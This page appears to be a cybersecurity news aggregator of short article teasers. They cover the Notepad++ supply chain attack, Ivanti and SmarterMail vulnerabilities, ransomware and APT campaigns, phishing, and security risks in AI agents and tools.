Patrick Gray and Adam Boileau are joined by the newest guy on the Risky Business Media team, James WIlson. They discuss the week’s cybersecurity news, including: Notepad++ update supply chain attack has been attributed to China The AI agent future is even more stupid than expected; behold the Ope...

Read Full Article →

This week I'm in Hong Kong, and the day after recording, I gave the talk shown in the image above at INTERPOL's Cybercrime Expert Group. I posted a little about this on Facebook and LinkedIn, but thought I'd expand on what really stuck with

Read Full Article → *(Covered by: Troy Hunt Blog)*

The Plone CMS stops a supply-chain attack, French cops raid the X Paris office; the number of malicious OpenClaw skills grows, and a Chinese APT hacked Notepad++ servers.

Read Full Article →

Senator Maria Cantwell, D-Wash., wants hearings to force AT&T and Verizon to disclose how they’ve responded to the hacks to protect telecom networks. The post Cantwell claims telecoms blocked release of Salt Typhoon report appeared first on CyberScoop .

Read Full Article →

Nick Andersen, a top CISA official, discussed plans for improving CIPAC and developing an AI-ISAC. The post What’s next for DHS’s forthcoming replacement critical infrastructure protection panel, AI information sharing appeared first on CyberScoop .

Read Full Article →

Limited attacks occurred prior to Ivanti’s disclosure, followed by mass exploitation by multiple threat groups. More than 1,400 potentially vulnerable instances remain exposed. The post Ivanti’s EPMM is under active attack, thanks to two critical zero-days appeared first on CyberScoop .

Read Full Article →

Cybersecurity researchers have disclosed details of a now-patched security flaw impacting Ask Gordon, an artificial intelligence (AI) assistant built into Docker Desktop and the Docker Command-Line Interface (CLI), that could be exploited to execute code and exfiltrate sensitive data. The critica...

Read Full Article →

40,000 WordPress sites are vulnerable to SQL injection in Quiz and Survey Master plugin

Read Full Article →

Panera Bread customer data leaked on the dark web, allowing researchers to determine how many people were hit.

Read Full Article →

Threat actors have been observed exploiting a critical security flaw impacting the Metro Development Server in the popular "@react-native-community/cli" npm package. Cybersecurity company VulnCheck said it first observed exploitation of CVE-2025-11953 (aka Metro4Shell) on December 21, 2025. With ...

Read Full Article →

A new ransomware-as-a-service operation dubbed “Vect” features custom malware

Read Full Article →

Elon Musk and X’s former CEO were summoned for voluntary interviews in Paris on April 20, 2026

Read Full Article →

TL;DR We’re launching Internal Scanning, bringing our proprietary security engines, research-led crawling and fuzzing engine for internal vulnerability scanning behind your firewall. Built by Detectify’s ... The post Introducing Detectify Internal Scanning for internal scanning behind the firewal...

Read Full Article →

Multi-stage attack begins with fake message relating to business requests and evades detection with link hidden in a PDF

Read Full Article →

The Russia-linked state-sponsored threat actor known as APT28 (aka UAC-0001) has been attributed to attacks exploiting a newly disclosed security flaw in Microsoft Office as part of a campaign codenamed Operation Neusploit. Zscaler ThreatLabz said it observed the hacking group weaponizing the sho...

Read Full Article →

Discover how Mercari, Japan's largest marketplace app, transformed their mobile security program with Oversecured, uncovering critical vulnerabilities missed by previous tools and achieving reliable automated scanning at scale.

Read Full Article →

Mozilla on Monday announced a new controls section in its Firefox desktop browser settings that allows users to completely turn off generative artificial intelligence (GenAI) features. "It provides a single place to block current and future generative AI features in Firefox," Ajit Varma, head of ...

Read Full Article →

A China-linked threat actor known as Lotus Blossom has been attributed with medium confidence to the recently discovered compromise of the infrastructure hosting Notepad++. The attack enabled the state-sponsored hacking group to deliver a previously undocumented backdoor codenamed Chrysalis to us...

Read Full Article →

Secretaries of State are scrambling to replace cybersecurity services once provided by CISA and other federal agencies. The post As feds pull back, states look inward for election security support appeared first on CyberScoop .

Read Full Article →

Read Full Article →

A malware-free phishing campaign targets corporate inboxes and asks employees to view "request orders," ultimately leading to Dropbox credential theft.

Read Full Article →

The Chinese APT group Lotus Blossom intruded the tool’s internal systems to snoop on a limited set of users’ activities, according to researchers. The post China-based espionage group compromised Notepad++ for six months appeared first on CyberScoop .

Read Full Article →

Mandiant analyzed ShinyHunters' MO, detailing how it steals login and MFA codes.

Read Full Article →

Some customers see credit card information also exposed, with police already notified.

Read Full Article →

The infamous Qilin group strikes again, this time targeting a major US airport.

Read Full Article →

A high-severity security flaw has been disclosed in OpenClaw (formerly referred to as Clawdbot and Moltbot) that could allow remote code execution (RCE) through a crafted malicious link. The issue, which is tracked as CVE-2026-25253 (CVSS score: 8.8), has been addressed in version 2026.1.29 relea...

Read Full Article →

A prolific data ransom gang that calls itself Scattered Lapsus ShinyHunters (SLSH) has a distinctive playbook when it seeks to extort payment from victim firms: Harassing, threatening and even swatting executives and their families, all while notifying journalists and regulators… Read More »

Read Full Article →

Following their attacks on Salesforce instances last year, members of the cybercrime group have broadened their targeting and gotten more aggressive with extortion tactics.

Read Full Article →

NSA released new guidelines to help organizations achieve target-level Zero Trust maturity

Read Full Article →

Hackers are hunting for vulnerable MongoDB servers and there are reportedly many to choose from.

Read Full Article →

A supply chain attack on Notepad++ update process was linked to compromised hosting infrastructure

Read Full Article →

TriZetto Provider Solutions breach was spotted in October 2025 after hackers lurked for almost a year.

Read Full Article →

Every week brings new discoveries, attacks, and defenses that shape the state of cybersecurity. Some threats are stopped quickly, while others go unseen until they cause real damage. Sometimes a single update, exploit, or mistake changes how we think about risk and protection. Every incident show...

Read Full Article →

Bitdefender has discovered a new Android malware campaign that uses Hugging Face

Read Full Article →

Cybersecurity researchers have disclosed details of a supply chain attack targeting the Open VSX Registry in which unidentified threat actors compromised a legitimate developer's resources to push malicious updates to downstream users. "On January 30, 2026, four established Open VSX extensions pu...

Read Full Article →

Beyond ACLs: Mapping Windows Privilege Escalation Paths with

Read Full Article →

A Farsi-speaking threat actor aligned with Iranian state interests is suspected to be behind a new campaign targeting non-governmental organizations and individuals involved in documenting recent human rights abuses. The activity, observed by HarfangLab in January 2026, has been codenamed RedKitt...

Read Full Article →

The FBI has seized control of RAMP, a notorious cybercrime online forum that bragged to be the only place that allowed ransomware, and boasted over 14,000 active users. Now some of those users' details are likely to be in the hands of the police... Read more in my article on the Bitdefender blog.

Read Full Article →

Google-owned Mandiant on Friday said it identified an "expansion in threat activity" that uses tradecraft consistent with extortion-themed attacks orchestrated by a financially motivated hacking group known as ShinyHunters. The attacks leverage advanced voice phishing (aka vishing) and bogus cred...

Read Full Article →

The Tenable One AI Exposure add-on discovers unsanctioned AI use in the organization and enforces policy compliance with approved tools.

Read Full Article →

Labyrinth Chollima is morphing into three separate entities, engaging in cyber-espionage, and crypto theft, against firms in the west.

Read Full Article →

When Ivanti removed the embargoes from CVE-2026-1281 and CVE-2026-1340 - pre-auth Remote Command Execution vulnerabilities in Ivanti’s Endpoint Manager Mobile (EPMM) solution - we sighed with relief. Clearly, the universe had decided to continue mocking Secure-By-Design signers right on schedule ...

Read Full Article →

CrowdStrike assessed that two new threat actor groups have spun off from North Korean Labyrinth Chollima hackers

Read Full Article →

From an Anthropic blog post : In a recent evaluation of AI models’ cyber capabilities, current Claude models can now succeed at multistage attacks on networks with dozens of hosts using only standard, open-source tools, instead of the custom tools needed by previous generations. This illustrates ...

Read Full Article →

The hackers behind a cyberattack that targeted Poland's grid infrastructure met little resistance when they hit systems at a heat-and-power plant and wind and solar farms last month. The intruders were able to easily access numerous systems at the affected facilities because the systems were conf...

Read Full Article →

Cybersecurity researchers have discovered a new campaign attributed to a China-linked threat actor known as UAT-8099 that took place between late 2025 and early 2026. The activity, discovered by Cisco Talos, has targeted vulnerable Internet Information Services (IIS) servers located across Asia, ...

Read Full Article →

The RedKitten campaign distributes lures designed to target people seeking information about missing persons or political dissidents in Iran

Read Full Article →

Behind the scenes of law enforcement in cyber: what do we know about caught cybercriminals? What brought them in, where do they come from and what was their function in the crimescape? Introduction: One view on the scattered fight against cybercrime The growing sophistication and diversification ...

Read Full Article →

SmarterTools has addressed two more security flaws in SmarterMail email software, including one critical security flaw that could result in arbitrary code execution. The vulnerability, tracked as CVE-2026-24423, carries a CVSS score of 9.3 out of 10.0. "SmarterTools SmarterMail versions prior to ...

Read Full Article →

Ivanti has rolled out security updates to address two security flaws impacting Ivanti Endpoint Manager Mobile (EPMM) that have been exploited in zero-day attacks, one of which has been added by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its Known Exploited Vulnerabilities...

Read Full Article →

Advanced persistent threat (APT) groups have deployed new cyber weapons against a variety of targets, highlighting the increasing threats to the region.

Read Full Article →

Hackers breach eScan antivirus and distribute a backdoor, Google takes down the IPIDEA proxy botnet, most GDPR fines remain uncollected, and the Poland wiper attack hit 30 locations.

Read Full Article →

After two years of daily ChatGPT use, I recently started experimenting with Claude, Anthropic’s competing AI assistant. Related: Microsofts see a ‘protopian’ AI future Claude is four to five times slower generating responses. But something emerged that matters more than … (more…) The post MY TAKE...

Read Full Article →

The fintech giant said it plans to "seek recoupment of any expenses" from its firewall provider SonicWall after a 2025 data breach exposed customer firewall configurations.

Read Full Article →

Google has taken coordinated action against the massive IPIDEA residential proxy network, enhancing customer protections and disrupting cybercrime operations

Read Full Article →

The French data protection regulator said that France Travail’s response to a 2024 data breach violated GDPR

Read Full Article →

The dark web forum administrator confirmed the takedown and said they had “no plans to rebuild”

Read Full Article →

Ransomware victims surged in Q4 2025 despite fewer active extortion groups, with data leaks rising 50%, ReliaQuest researchers report

Read Full Article →

In episode 452, a London-based YouTuber wins a landmark court case against Saudi Arabia after his phone was hacked with Pegasus spyware — exposing how a single, seemingly harmless text message can turn a smartphone into a round-the-clock surveillance device. Plus, we go looking for professional h...

Read Full Article →

Ransomware defense requires focusing on business resilience. This means patching issues promptly, improving user education, and deploying multifactor authentication.

Read Full Article →

Outtake makes an agentic cybersecurity platform to help enterprises detect identity fraud. Its angel investors read like a who's who of tech industry names.

Read Full Article →

Check Point's flagship report delivers industry leading intelligence shaping the decisions security leaders will make in 2026

Read Full Article →

Two critical security flaws in n8n have exposed sandboxing vulnerabilities, enabling remote code execution for attackers

Read Full Article →

Researchers discover that PureRAT’s code now contains emojis – indicating it has been written by AI based-on comments ripped from social media.

Read Full Article →

Zscaler analysts found critical vulnerabilities in 100% of enterprise AI systems, with 90% compromised in under 90 minutes

Read Full Article →

A new ransomware strain that entered the scene last year has poorly designed code and uses Hebrew language that might be a false flag.

Read Full Article →

[this work was conducted collaboratively by Bryan Alexander and Jordan Whitehead] This post details several vulnerabilities discovered in the popular online game Command & Conquer: Generals. We recently presented some of this work at an information security conference and this post contain

Read Full Article →

The malware-as-a-service kit enables malicious extensions to overlay pages on real websites without changing the visible URL, signaling a fresh challenge for enterprise security.

Read Full Article →

Critical sandbox escape vulnerability in Grist-Core enables remote code execution via a malicious formula

Read Full Article →

Nike is investigating after the World Leaks ransomware group posted a 1.4TB data dump

Read Full Article →

Researchers attributed the failed attempt to the infamous Russian APT Sandworm, which is notorious for wiper attacks on critical infrastructure organizations.

Read Full Article →

The cybercriminals in control of Kimwolf -- a disruptive botnet that has infected more than 2 million devices -- recently shared a screenshot indicating they'd compromised the control panel for Badbox 2.0, a vast China-based botnet powered by malicious software that comes pre-installed on many An...

Read Full Article →

The US law firm Hagens Berman will lead a class action lawsuit against Coupang over security failures that led to a June 2025 data breach

Read Full Article →

Threat actors posing as IT support teams use phishing kits to generate fake login sites in real-time to trick victims into handing over credentials

Read Full Article →

A destructive cyber attack targeting Poland’s energy sector has been linked to Russian APT group Sandworm

Read Full Article →

A cyberattack that targeted power plants and other energy producers in Poland at the end of December used malware known as a “wiper” that was intended to erase computers as part of an operation intended to cause a power outage and other disruption to services, says European security

Read Full Article →

Under Armour said there is no evidence at this point to suggest the incident affected systems used to process payments or store customer passwords

Read Full Article →

MIAMI, Jan. 22, 2026, CyberNewswire — Halo Security , a leading provider of external attack surface management and penetration testing services, today announced it has successfully achieved SOC 2 Type II compliance following an extensive multi-month audit by Insight Assurance.… (more…) The post N...

Read Full Article →

Critical vulnerability in Appsmith allows account takeover via flawed password reset process

Read Full Article →

North Korea-linked threat group KONNI targets countries across APAC, specifically in blockchain sectors, with AI-generated malware

Read Full Article →

Phoney email alerts suggest users need to backup their LastPass accounts within 24 hours. LastPass says it would never require this action from users

Read Full Article →

DLA Piper finds 22% increase in breached firms notifying European GDPR regulators

Read Full Article →

Well, well, well - look what we’re back with. You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV holders. The plot of that story had everything; * A g...

Read Full Article →

### Summary It is still possible (albeit with significantly more effort) to upload a specially crafted Wheel file (i.e. zip) to PyPI that when installed with PIP (or another Python zipfile based t...

Read Full Article →

Cyber risks for the Milano-Cortina 2026 Winter Games include phishing and spoofed websites as key threat vectors

Read Full Article →

Loan phishing operation in Peru is stealing card info by impersonating financial institutions

Read Full Article →

AI hallucination is still the deal-breaker. Related: Correcting LLM hallucinations As companies rush AI into production, executives face a basic constraint: you cannot automate a workflow if you cannot trust the output. A model that fabricates facts becomes a risk … (more…) The post SHARED INTEL ...

Read Full Article →

Gartner predicts 50% of organizations will adopt zero trust data governance by 2028

Read Full Article →

ATLANTA, Jan. 20, 2026, CyberNewswire — Airlock Digital , a leader in proactive application control and endpoint security, announced the release of The Total Economic Impact (TEI) of Airlock Digital , an independent study commissioned by Airlock Digital and conducted … (more…) The post News alert...

Read Full Article →

ALISO VIEJO, Calif., Jan. 20, 2026, CyberNewswire — One Identity, a trusted leader in identity security , today announces a major upgrade to One Identity Manager, a top-rated IGA solution , strengthening identity governance as a critical security control for … (more…) The post News alert: One Ide...

Read Full Article →

Learn how we are using the newly released GitHub Security Lab Taskflow Agent to triage categories of vulnerabilities in GitHub Actions and JavaScript projects.

Read Full Article →

A new Internet-of-Things botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic. Kimwolf's ability to scan the local networks of comp...

Read Full Article →

Three vulnerabilities in Anthropic's Git server for the MCP can be exploited via prompt injection

Read Full Article →

Cybersecurity Researchers at ReliaQuest warn of an ongoing campaign delivered to “high-value individuals” via LinkedIn messages

Read Full Article →

In cybersecurity, an inaccessible tool isn’t just a nuisance: it’s a vulnerability. With the European Accessibility Act tightening regulations across Sweden and the EU, “good ... The post Why inaccessible cybersecurity is a security risk: our path to accessibility appeared first on Blog Detectify .

Read Full Article →

Weaponized AI is fueling a new wave of cybercrime, said Group-IB in its latest report

Read Full Article →

VoidLink's framework marks the first evidence of fully AI-designed and built advanced malware, beginning a new era of AI-generated malware

Read Full Article →

Read Full Article → *(Covered by: 0day Fans)*

An email from Claude landed in my inbox Friday morning with a subject line that stopped me cold: “Using Claude for your everyday life.” Related: AI’s fortune teller effect Not “Unlock the power of AI” or “Transform your productivity.” Just… … (more…) The post MY TAKE: From ‘holy mackeral’ to ‘dai...

Read Full Article →

UK NCSC warned of disruptive cyber attacks by Russian hacktivists targeting critical infrastructure

Read Full Article →

Windows has supported computer telephony integration for decades, providing applications with the ability to manage phone devices, lines, and calls. While modern deployments increasingly rely on cloud-based telephony solutions, classic telephony services remain available out of the box in Windows...

Read Full Article →

Oleg Evgenievich Nefedov, allegedly one of the founders of Black Basta, was also placed on Europol’s and Interpol’s Most Wanted lists

Read Full Article →

Recently I ran an experiment where I built agents on top of Opus 4.5 and GPT-5.2 and then challenged them to write exploits for a zeroday vulnerability in the QuickJS Javascript interpreter. I adde…

Read Full Article →

Developers are frequently granting Claude Code permission to download, execute, and delete code, creating fertile ground for prompt injection attacks.

Read Full Article →

An eSentire report showed credential theft accounted for 74% of all observed cyber threats in 2025

Read Full Article →

Check Point Research has reported a surge in attacks on a vulnerability in HPE OneView, driven by the Linux-based RondoDox botnet

Read Full Article →

Consuming from Microsoft-Windows-Threat-Intelligence without Antimalware-PPL or kernel patching/driver loading.

Read Full Article →

We can no longer say that artificial intelligence is a "future risk", lurking somewhere on a speculative threat horizon. The truth is that it is a fast-growing cybersecurity risk that organizations are facing today. That's not just my opinion, that's also the message that comes loud and clear fro...

Read Full Article →

While ‘traditional’ ransomware attacks remain stable, some gangs are shifting towards exploiting zero-days and supply chains to go straight to stealing data

Read Full Article →

DDoS-ers are striking a website linked to a data breach at the Department of Homeland Security

Read Full Article →

Read Full Article →

Announcing GitHub Security Lab Taskflow Agent, an open source and collaborative framework for security research with AI.

Read Full Article →

RedVDS cyber-crime-as-a-service platform powering phishing, BEC attacks and other fraud has cost victims millions

Read Full Article →

Phishing attacks have been identified using fake PayPal alerts to exploit remote monitoring and management tools

Read Full Article →

Key findings Introduction In December 2025, a previously unknown Ransomware-as-a-Service (RaaS) operation calling itself Sicarii began advertising its services across multiple underground platforms. The group’s name references the Sicarii, a 1st-century Jewish assassins group that opposed Roman r...

Read Full Article →

A new DeadLock ransomware operation uses Polygon blockchain smart contracts to manage proxy server addresses

Read Full Article →

Microsoft today issued patches to plug at least 113 security holes in its various Windows operating systems and supported software. Eight of the vulnerabilities earned Microsoft's most-dire "critical" rating, and the company warns that attackers are already exploiting one of the bugs fixed today.

Read Full Article →

Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025

Read Full Article →

In episode 83 of The AI Fix, Graham reveals he's taken up lying to LLMs, and shows how a journalist exposed AI bluffers with a made-up idiom. Meanwhile Mark invents a "Godwin's Law" for AI, and explains how to ruin any LLM with humus. Also in this episode, a marriage is declared invalid thanks to...

Read Full Article →

A high-severity security flaw in the Gogs Git service is being actively exploited, leading to remote code execution

Read Full Article →

SHADOW#REACTOR is a multi-stage Windows malware campaign that stealthily deploys the Remcos RAT using complex infection techniques

Read Full Article →

Cybersecurity researchers issue warning over a surge in attacks designed to trick Facebook users into handing over login credentials

Read Full Article →

Remember the Ashley Madison data breach? That was now more than a decade ago, yet it arguably remains the single most noteworthy data breach of all time. There are many reasons for this accolade, but chief among them is that by virtue of the site being expressly designed to facilitate

Read Full Article →

If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.

Read Full Article →

Have you ever stolen data, traded a hacking tool, or just lurked on a dark web forum believing that you are anonymous? If so, I might have some unsettling news for you. Read more in my article on the Hot for Security blog.

Read Full Article →

The new framework maintains long-term access to Linux systems while operating reliably in cloud and container environments

Read Full Article →

“Pervasive” threat of phishing, invoice scams and other cyber-enabled fraud is at “record highs”, warns WEF Cybersecurity Outlook 2026

Read Full Article →

Read Full Article →

Read Full Article →

Guardicore Labs uncovers a Ransomware detection campaign targeting MySQL servers. Attackers use Double Extortion and publish data to pressure victims.

Read Full Article →

Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, infection, network propagation and malware analysis and recommendations for optimizing incident res...

Read Full Article →

We are seeing exploitation of SolarWinds Web Help Desk via CVE‑2025‑40551 and CVE‑2025‑40536 that can lead to domain compromise; here is how to patch, hunt, and mitigate now. The post Analysis of active exploitation of SolarWinds Web Help Desk appeared first on Microsoft Security Blog .

Read Full Article →

We introduce a novel method that maps cloud alert trends to MITRE ATT&CK techniques. The patterns created could identify threat actors by behavior. The post Novel Technique to Detect Cloud Threat Actor Operations appeared first on Unit 42 .

Read Full Article →

Here’s how to spot deepfakes, protect yourself from identity theft, and avoid falling for neural network scams.

Read Full Article →

This week, Joe cautions the rush to adopt AI tools rife with truly awful security vulnerabilities.

Read Full Article →

CrashFix crashes browsers to coerce users into executing commands that deploy a Python RAT, abusing finger.exe and portable Python to evade detection and persist on high‑value systems. The post New Clickfix variant ‘CrashFix’ deploying Python Remote Access Trojan appeared first on Microsoft Secur...

Read Full Article →

Discover how 7.1% of AI agent skills are designed to leak secrets, PII, and API keys through LLM context. Learn to defend with Evo & mcp-scan.

Read Full Article →

Most security incidents happen in the gap between knowing what matters and actually implementing security controls consistently. Read how Microsoft is helping organizations close this implementation gap. The post The security implementation gap: Why Microsoft is supporting Operation Winter SHIELD...

Read Full Article →

A set of SIEM rules for detecting attempts to bypass authentication in Fortinet products using the FortiCloud SSO mechanism has been added to the Kaspersky Unified Monitoring and Analysis Platform.

Read Full Article →

When Rapid7 published its analysis of the Chrysalis backdoor linked to a compromise of Notepad++ update infrastructure, it raised understandable questions from customers and security teams. The investigation showed that attackers did not exploit a flaw in the application itself. Instead, they com...

Read Full Article →

From school districts to state agencies, 2025 cyber incidents were a wake-up call about asset visibility. Discover five actionable lessons SLG leaders can use to close the cyber exposure gap and move from reactive threat detection and response to proactive exposure management. Key takeaways Effec...

Read Full Article →

Cisco Talos uncovered “DKnife,” a fully featured gateway-monitoring and adversary-in-the-middle (AitM) framework comprising seven Linux-based implants.

Read Full Article →

In 2025 a threat group compromised government and critical infrastructure in 37 countries, with reconnaissance in 155. The post The Shadow Campaigns: Uncovering Global Espionage appeared first on Unit 42 .

Read Full Article →

We analyze the recent Stan Ghouls campaign targeting organizations in Russia and Uzbekistan: Java-based loaders, the NetSupport RAT, and a potential interest in IoT.

Read Full Article →

Snyk’s ToxicSkills research reveals 36% of AI agent skills contain security flaws, including 1,467 vulnerable skills and active malicious payloads targeting OpenClaw, Claude Code, and Cursor users.

Read Full Article →

We're releasing new research on detecting backdoors in open-weight language models and highlighting a practical scanner designed to detect backdoored models at scale and improve overall trust in AI systems. The post Detecting backdoored language models at scale appeared first on Microsoft Securit...

Read Full Article →

Tenable Research discovered two novel vulnerabilities in Google Looker that could allow an attacker to completely compromise a Looker instance. Google moved swiftly to patch these issues. Organizations running Looker on-prem should verify they have upgraded to the patched versions. Key takeaways ...

Read Full Article →

Why do successful phishing attacks target our psychology rather than just our software? Discover Unit 42’s latest insights on defeating social engineering and securing your digital life. The post Why Smart People Fall For Phishing Attacks appeared first on Unit 42 .

Read Full Article →

Bulletproof hosting providers are abusing the legitimate ISPsystem infrastructure to supply virtual machines to cybercriminals Categories: Threat Research Tags: virtual machine, cybercrime, Ransomware, ISPs

Read Full Article →

Moltbot, the viral AI agent, offers immense power but is riddled with critical vulnerabilities, including remote code execution (RCE), exposed control interfaces, and malicious extensions. Read on to understand the vulnerabilities associated with Moltbot and the immediate security practices users...

Read Full Article →

Discover Microsoft’s holistic SDL for AI combining policy, research, and enablement to help leaders secure AI systems against evolving cyberthreats. The post Microsoft SDL: Evolving security practices for an AI-powered world appeared first on Microsoft Security Blog .

Read Full Article →

Threat actors compromised the update infrastructure for Notepad++, redirecting traffic to an attacker controlled site for targeted espionage purposes. Change log Update February 4: This FAQ blog has been updated to note that CVE-2025-15556 was assigned for this security incident. Click here to re...

Read Full Article →

Kaspersky GReAT experts discovered previously undocumented infection chains used in the Notepad++ supply chain attacks. The article provides new IoCs related to those incidents which employ DLL sideloading and Cobalt Strike Beacon delivery.

Read Full Article →

Snyk introduces the AI Security Fabric and a prescriptive path to help organizations secure software at the speed of AI. Discover how to operationalize AI security and scale innovation without compromising on safety.

Read Full Article →

Learn how to move from vision to practice with the Prescriptive Path, a framework for operationalizing AI security at scale. By replacing fragmented tools with a unified platform, you can build trust and secure AI-native applications at machine speed.

Read Full Article →

How modern infostealers target macOS systems, leverage Python‑based stealers, and abuse trusted platforms and utilities to distribute credential‑stealing payloads. The post Infostealers without borders: macOS, Python stealers, and platform abuse appeared first on Microsoft Security Blog .

Read Full Article →

Why it would be useful to identify the specific hacking group behind a malware file found in your infrastructure.

Read Full Article →

Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central Am...

Read Full Article →

Tenable Cloud Security continues to expand the technical depth of our Tenable One exposure management platform. Our latest enhancements include unified multi-cloud exploration, high-fidelity network validation, and expanded entitlement visibility across infrastructure and identity providers. Key ...

Read Full Article →

Kaspersky Unified Monitoring and Analysis Platform, version 4.2: detecting compromised accounts using AI, updated correlator, and other innovations.

Read Full Article →

We detail our discovery of CVE-2025-0921. This privileged file system flaw in SCADA system Iconics Suite could lead to a denial-of-service (DoS) attack. The post Privileged File System Vulnerability Present in a SCADA System appeared first on Unit 42 .

Read Full Article →

Securing AI-powered applications requires more than just safeguarding prompts. Organizations must adopt a holistic approach that includes monitoring the AI supply chain, assessing frameworks, SDKs, and orchestration layers for vulnerabilities, and enforcing strong runtime controls for agents and ...

Read Full Article →

Two Critical vulnerabilities in Ivanti’s popular mobile device management solution have been exploited in the wild in limited attacks Key takeaways: Patch Ivanti EPMM immediately. Both CVE-2026-1281 and CVE-2026-1340 have been exploited in the wild, though impact has been limited so far. Apply th...

Read Full Article →

Security teams often spend days manually turning long incident reports and threat writeups into actionable detections by extracting TTPs. This blog post shows an AI-assisted workflow that does the same job in minutes. It extracts the TTPs, maps them to existing detection coverage, and flags poten...

Read Full Article →

Hazel reflects on how to find balance while staying informed, then delivers practical updates and insights on the latest cybersecurity threats.

Read Full Article →

The 2026 Microsoft Data Security Index explores one of the most pressing questions facing organizations today: How can we harness the power of generative while safeguarding sensitive data? The post New Microsoft Data Security Index report explores secure AI adoption to protect sensitive data appe...

Read Full Article →

On January 20, Kaspersky solutions detected malware used in eScan antivirus supply chain attack. In this article we provide available information on the threat: indicators of compromise, threat hunting and mitigating tips, etc.

Read Full Article →

AI toys have been found discussing knives, drugs, sex, and mature games with children. We dive into the latest research results and the risks to security and privacy.

Read Full Article →

Microsoft has published three out-of-band (OOB) updates so far in January 2026. One of these updates was released to address a vulnerability, CVE-2026-21509, affecting Microsoft Office that has been reportedly exploited in the wild.

Read Full Article →

Cisco Talos has identified a new, regionally targeted campaign by UAT-8099 that leverages advanced persistence techniques and custom BadIIS malware variants to compromise IIS servers, particularly in Thailand and Vietnam.

Read Full Article →

A drop in exploitation and ransomware, but a spike in phishing and credential abuse, show why timely patching and robust MFA matter more than ever.

Read Full Article →

Most ransomware attacks are opportunistic, not targeted at a specific sector or region Categories: Threat Research Tags: Ransomware, cybercrime, state-sponsored ransomware, victimization

Read Full Article →

Congratulations to the winners of the 2026 Microsoft Security Excellence Awards that recognize the innovative defenders who have gone above and beyond. The post Microsoft announces the 2026 Security Excellence Awards winners appeared first on Microsoft Security Blog .

Read Full Article →

How to safely use Android devices in the face of 2026’s new security threats

Read Full Article →

Continuously discover and monitor all AI usage across your organization, including shadow AI, agents, browser plug-ins, and more, with Tenable One AI Exposure. Map complex AI workflows to reveal high-impact exposures and monitor compliance with security and AI acceptable use policies. Key takeawa...

Read Full Article →

Kaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka Mustang Panda or Bronze President) APT campaigns, including three variants of a browser data stealer.

Read Full Article →

Categories: Threat Research Tags: Microsoft Office, vulnerability, advisory

Read Full Article →

Key security controls to implement in your organization to protect against malicious AI agent behavior.

Read Full Article →

Read Full Article →

Categories: Sophos Insights Tags: Sophos AI, Gen AI, Year in Review

Read Full Article →

A new study shows that verse-based prompts can slash the effectiveness of AI safety constraints. We’re breaking down an experiment involving 25 language models and its key takeaways.

Read Full Article →

In this week's newsletter, Bill hammers home the old adage, "Know your environment" — even throughout alert fatigue.

Read Full Article →

SmarterMail versions prior to Build 9511 are vulnerable to privileged account takeover and remote code execution. Learn more about the latest Huntress DE&TH Team’s findings.

Read Full Article →

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities in Foxit PDF Editor, one in the Epic Games Store, and twenty-one in MedDream PACS.

Read Full Article →

We discuss a novel AI-augmented attack method where malicious webpages use LLM services to generate dynamic code in real-time within a browser. The post The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time appeared first on Unit 42 .

Read Full Article →

With the WhisperPair attack, a stranger can pair their device with your headphones to keep tabs on your location.

Read Full Article →

Oracle addresses 158 CVEs in its first quarterly update of 2026 with 337 patches, including 27 critical updates. Key takeaways: The first Critical Patch Update (CPU) for 2026, contains fixes for 158 unique CVEs in 337 security updates. 27 issues (8% of all patches) were assigned a critical severi...

Read Full Article →

Tenable Research has discovered a server-side request forgery (SSRF) vulnerability in Java’s handling of client certificates during a TLS handshake. In certain configurations, this can be abused to cause a denial-of-service (DoS) condition. Key takeaways Tenable Research identified a vulnerabilit...

Read Full Article →

We've identified an aspect of Azure’s Private Endpoint architecture that could expose Azure resources to denial of service (DoS) attacks. The post DNS OverDoS: Are Private Endpoints Too Private? appeared first on Unit 42 .

Read Full Article →

How can organizations find and fix systems vulnerable to Y2K38 — the Unix epoch time overflow problem, also known as Epochalypse?

Read Full Article →

In this week’s newsletter, Martin examines the evolving landscape for 2026, highlighting key threats, emerging trends like AI-driven risks, and the continued importance of addressing familiar vulnerabilities.

Read Full Article →

Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.

Read Full Article →

Exploit code has been published for CVE-2025-64155, a critical command injection vulnerability affecting Fortinet FortiSIEM devices. Key takeaways: CVE-2025-64155 is a critical operating system (OS) command injection vulnerability affecting Fortinet FortiSIEM. Fortinet vulnerabilities have histor...

Read Full Article →

Terryn’s path to cybersecurity started with a fascination for criminal forensics and a knack for jailbreaking his family's tech — interests that eventually steered him toward the fast-paced world of digital investigations.

Read Full Article →

Database platform MongoDB disclosed CVE-2025-14847, called MongoBleed. This is an unauthenticated memory disclosure vulnerability with a CVSS score of 8.7. The post Threat Brief: MongoDB Vulnerability (CVE-2025-14847) appeared first on Unit 42 .

Read Full Article →

Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical”.

Read Full Article →

We identified remote code execution vulnerabilities in open-source AI/ML libraries published by Apple, Salesforce and NVIDIA. The post Remote Code Execution With Modern AI/ML Formats and Libraries appeared first on Unit 42 .

Read Full Article →

If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.

Read Full Article →

Authorities believe the would-be alleged thieves were being extorted by mysterious figures named “Red” and “8” who communicated with them over signal.

Read Full Article →

Computers are very good at doing exactly what they’re told. They’re still not very good at coming up with helpful suggestions of their own. They’re very much more about following …read more

Read Full Article →

If you purchased an E-mu Audity 2000 ROMpler back in 1998, you almost certainly got a rig with the 1.00 firmware. It was fine, if a little limited, particularly where …read more

